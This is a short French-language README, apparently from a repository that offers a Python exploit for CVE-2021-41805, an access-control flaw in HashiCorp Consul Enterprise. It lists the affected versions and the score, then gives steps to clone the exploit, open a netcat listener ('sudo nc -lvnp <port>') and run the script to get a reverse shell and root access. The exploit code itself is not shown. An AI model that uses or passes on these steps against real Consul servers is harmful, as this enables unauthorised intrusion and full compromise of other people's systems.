
Exploit HashiCorp Consul avec python. (CVE-2021-41805)
HashiCorp Consul Enterprise avant 1.8.17, 1.9.x avant 1.9.11, et 1.10.x avant 1.10.4 présente un contrôle d'accès incorrect. Un jeton ACL (avec les permissions par défaut operator:write) dans un espace de noms peut être utilisé pour une escalade de privilèges non intentionnelle dans un espace de noms différent.
CVE_ID : CVE-2021-41805
Base Score : 8.8
Sévérité : Élevée
Publié le : 2021-12-12
Versions affectées : HashiCorp Consul Enterprise avant 1.8.17, 1.9.x avant 1.9.11, et 1.10.x avant 1.10.4
https://www.cvedetails.com/cve/CVE-2021-41805/
https://security.netapp.com/advisory/ntap-20211229-0007/
Obtenir un shell inverse et un accès root.
git clone https://github.com/I-Am-Nelson/CVE-2021-41805.git
cd CVE-2021-41805
Puis lancez le listener :
sudo nc -lvnp <port>
Puis exécutez l'exploit :
python3 CVE-2021-41805.py